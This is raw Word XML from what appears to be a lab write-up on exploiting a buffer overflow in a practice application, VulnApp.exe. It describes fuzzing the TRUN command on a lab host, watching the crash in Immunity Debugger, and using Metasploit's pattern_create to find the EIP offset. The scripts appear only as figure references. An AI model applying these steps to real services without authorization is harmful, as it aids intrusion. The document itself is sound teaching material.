      </w:r>
      <w:r w:rsidR="004A7613">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fuzzScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.py</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="5623657E" w14:textId="26F97E4C" w:rsidR="00E34B94" w:rsidRDefault="00E34B94" w:rsidP="004D11C1">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="107C7174" w14:textId="74276A39" w:rsidR="004A7613" w:rsidRDefault="004A7613" w:rsidP="004D11C1">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>In</w:t>
      </w:r>
      <w:r w:rsidR="00E34B94">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> the above code</w:t>
      </w:r>
      <w:r w:rsidR="008A38B9">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00764661">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">a socket to enable the connection is created and passed </w:t>
      </w:r>
      <w:r w:rsidR="00E34B94">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">the IP address of the target host (192.168.56.107) and the identified port (9999) </w:t>
      </w:r>
      <w:r w:rsidR="00764661">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Then  the </w:t>
      </w:r>
      <w:r w:rsidR="008A38B9">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">buffer variable assigned 100 A </w:t>
      </w:r>
      <w:r w:rsidR="00764661">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>characters</w:t>
      </w:r>
      <w:r w:rsidR="008A38B9">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00764661">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="008A38B9">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>binded to the</w:t>
      </w:r>
      <w:r w:rsidR="00764661">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerable</w:t>
      </w:r>
      <w:r w:rsidR="008A38B9">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘TRUN’</w:t>
      </w:r>
      <w:r w:rsidR="00764661">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> command and sent to the target machine. </w:t>
      </w:r>
      <w:r w:rsidR="005A0F07">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>It will send A (\x41 in hex) incrementally at 100 bytes a time until it’s no longer able to communicate with the port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00764661">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> After a successful crash, a message will be displayed highlighting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>when crashed occurred in bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA66FD4" w14:textId="111917C1" w:rsidR="004D11C1" w:rsidRDefault="00764661" w:rsidP="004D11C1">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>Note that the additional characters ‘/.:/’ are commands that go after TRUN and must be included to gain access to this injection point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36353EB7" w14:textId="5BA094C2" w:rsidR="004D11C1" w:rsidRDefault="004A7613" w:rsidP="004D11C1">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>Before running the fuzzScript, the VulnApp.exe is attached to immunity debugger</w:t>
      </w:r>
      <w:r w:rsidR="00116639">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> [Figure 1.2] [Figure1.3]</w:t>
      </w:r>
      <w:r w:rsidR="00E1017C">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D426FB" w14:textId="337EEE55" w:rsidR="00116639" w:rsidRDefault="00116639" w:rsidP="004D11C1">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11D50E5D" wp14:editId="0CB94F9B">
            <wp:extent cx="5162550" cy="3127314"/>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93605" cy="3146126"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA4B62C" w14:textId="2E0DF472" w:rsidR="00116639" w:rsidRDefault="00116639" w:rsidP="00116639">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc64889313"/>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Attaching VulnApp to Immunity Debugger</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="68677E6C" w14:textId="77777777" w:rsidR="00116639" w:rsidRPr="00116639" w:rsidRDefault="00116639" w:rsidP="00116639"/>
    <w:p w14:paraId="278A0A9F" w14:textId="6C920A74" w:rsidR="00116639" w:rsidRDefault="00116639" w:rsidP="00116639">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39A7F3DC" w14:textId="0D6E2BB5" w:rsidR="00116639" w:rsidRDefault="00116639" w:rsidP="00116639">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4200"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1709A5EA" wp14:editId="39564B25">
            <wp:extent cx="5495925" cy="3732649"/>
            <wp:effectExtent l="0" t="0" r="0" b="127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2393" cy="3784584"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CE5E9B" w14:textId="2E48FAF7" w:rsidR="00E1017C" w:rsidRDefault="00E1017C" w:rsidP="00E1017C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc64889314"/>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Immunity Debugger running VulnApp.exe</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="40D0A17C" w14:textId="77777777" w:rsidR="00E1017C" w:rsidRPr="00E1017C" w:rsidRDefault="00E1017C" w:rsidP="00E1017C"/>
    <w:p w14:paraId="568F7C6B" w14:textId="59A50184" w:rsidR="00E1017C" w:rsidRDefault="00E1017C" w:rsidP="00E1017C">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A380D54" w14:textId="3A77B077" w:rsidR="00E1017C" w:rsidRDefault="00E1017C" w:rsidP="00E1017C"/>
    <w:p w14:paraId="1CB9A4D7" w14:textId="18F59D41" w:rsidR="00E1017C" w:rsidRDefault="00E1017C" w:rsidP="00E1017C"/>
    <w:p w14:paraId="7BF7CAF5" w14:textId="0CAEE315" w:rsidR="00E1017C" w:rsidRDefault="00E1017C" w:rsidP="00E1017C">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Running the script [Figure 1.4] now will confirm that the A character values declared in the script are creating an access violation and getting passed to the EBP register [Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.5].</w:t>
      </w:r>
      <w:r w:rsidR="005A0F07">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> In this case, it didn’t overwrite the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="005A0F07">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>EIP</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="005A0F07">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> but it stops communicating with the port at 2100 bytes</w:t>
      </w:r>
      <w:r w:rsidR="00B73721">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> establishing that the application crashed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B6D236" w14:textId="0470C50B" w:rsidR="00E1017C" w:rsidRDefault="00E1017C" w:rsidP="00E1017C">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7543D93C" wp14:editId="58CAC68B">
            <wp:extent cx="4657725" cy="733425"/>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57725" cy="733425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F89C87A" w14:textId="69EFD98C" w:rsidR="00E1017C" w:rsidRDefault="00E1017C" w:rsidP="00E1017C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc64889315"/>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4:Running fuzzScript.py and crash message</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="3179B038" w14:textId="161EEDE8" w:rsidR="00E1017C" w:rsidRPr="00E1017C" w:rsidRDefault="00E1017C" w:rsidP="00E1017C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B99A5BD" wp14:editId="36A3164F">
            <wp:extent cx="5857875" cy="3451860"/>
            <wp:effectExtent l="0" t="0" r="952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73135" cy="3460852"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2361156B" w14:textId="3C5A5AC2" w:rsidR="00E1017C" w:rsidRDefault="00E1017C" w:rsidP="00E1017C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc64889316"/>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Register Values Inspection after VulnApp crash</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="5E27A948" w14:textId="329615F6" w:rsidR="005A0F07" w:rsidRDefault="005A0F07" w:rsidP="00E1017C"/>
    <w:p w14:paraId="24D22E7E" w14:textId="4FEC0764" w:rsidR="005A0F07" w:rsidRDefault="005A0F07" w:rsidP="005A0F07">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1328">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Generating A Pattern To Find The Offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0695FD97" w14:textId="374F73B8" w:rsidR="005A0F07" w:rsidRDefault="005A0F07" w:rsidP="005A0F07">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B73721">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>Using the pattern_create ruby file provided by Metasploi</w:t>
      </w:r>
      <w:r w:rsidR="00B73721" w:rsidRPr="00B73721">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>t, a unique string of no repeating characters will be generated</w:t>
      </w:r>
      <w:r w:rsidR="00102114">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> [Figure 2.1]</w:t>
      </w:r>
      <w:r w:rsidR="00B73721" w:rsidRPr="00B73721">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and sent to the application’s buffer</w:t>
      </w:r>
      <w:r w:rsidR="007D0171">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> using the second python script</w:t>
      </w:r>
      <w:r w:rsidR="00102114">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>[Figure 2.2]</w:t>
      </w:r>
      <w:r w:rsidR="00B73721" w:rsidRPr="00B73721">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">. This payload will display </w:t>
      </w:r>
      <w:r w:rsidR="00B73721">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>a value on the EIP when the program crashes</w:t>
      </w:r>
      <w:r w:rsidR="00102114">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> [Figure 2.3]</w:t>
      </w:r>
      <w:r w:rsidR="00B73721" w:rsidRPr="00B73721">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B73721">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> This value can then be used to find the offset</w:t>
      </w:r>
      <w:r w:rsidR="00B73721" w:rsidRPr="00B73721">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> The offset is the exact number of bytes it takes to fill the application</w:t>
      </w:r>
      <w:r w:rsidR="00B73721">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00B73721" w:rsidRPr="00B73721">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>s buffer</w:t>
      </w:r>
      <w:r w:rsidR="00B73721">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134FF8E3" w14:textId="29264057" w:rsidR="00B73721" w:rsidRDefault="00B73721" w:rsidP="005A0F07">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B7F1D73" wp14:editId="25D10F12">
            <wp:extent cx="6057900" cy="2109383"/>
            <wp:effectExtent l="0" t="0" r="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24056" cy="2167239"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B52EDE2" w14:textId="33C2996A" w:rsidR="00102114" w:rsidRDefault="00102114" w:rsidP="00102114">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Generating the Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4AC3E5" w14:textId="54EE6ABE" w:rsidR="005A0F07" w:rsidRDefault="00102114" w:rsidP="00E1017C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="097969B5" wp14:editId="06F6936F">
            <wp:extent cx="5943600" cy="2657475"/>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14:paraId="4A4947E4" w14:textId="5BD68151" w:rsidR="00102114" w:rsidRDefault="00102114" w:rsidP="00102114">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Adding Generated pattern to New Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5981F0A9" w14:textId="57205EA9" w:rsidR="00102114" w:rsidRDefault="007D0171" w:rsidP="00102114">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B5299F4" wp14:editId="13795A16">
            <wp:extent cx="6265333" cy="2286000"/>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269590" cy="2287553"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B42E3DD" w14:textId="69F6A4D3" w:rsidR="007D0171" w:rsidRDefault="007D0171" w:rsidP="007D0171">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>EAX,ESP and EIP values after running fuzzScript2.py</w:t>
      </w:r>
    </w:p>
